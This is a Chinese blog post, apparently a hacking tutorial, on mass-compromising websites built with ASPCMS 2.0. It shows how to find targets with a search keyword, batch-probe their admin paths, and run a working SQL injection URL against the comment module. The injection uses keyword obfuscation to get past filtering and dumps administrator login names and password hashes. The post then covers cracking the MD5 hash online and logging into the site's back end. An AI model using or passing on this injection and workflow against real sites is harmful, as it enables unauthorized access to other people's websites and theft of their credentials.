这几天看过一个网络上很久前的一个视频,想着针对ASPCMS的网站现在是不是还有效呢;
关键词:Powered by AspCms2.0
通过设置对应关键词,然后点击开始即可;
通过上一步导出的链接,加载到这一步的工具中,然后通过后台路径字典来实现批量检测并筛选:
此步利用的是系统里面在留言模块所涉及的一个漏洞来执行;参考代码如下:
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
纪实阁通过上一步中检测出来的链接,随机打开一个然后加入上方的代码,在浏览器里面运行得到以下效果:
此处圈起来的即为管理员ID为admin的用户对应密码的MD5加密字符串,然后我们通过网上MD5解密网站直接进行解密得到结果如下:
这样就得到了当前网站的账号密码,然后通过得到的账号密码直接登陆后台后如下:
面对这类网站被攻击,我们先前也给予过完整的预防方案,可以参考:
提取密码: uxsd
亲爱的,文件已经以邮件方式发送至用户注册时候所填写的邮箱,请注意查收,如有问题,请联系客服[/reply]
要发表评论,您必须先登录。
好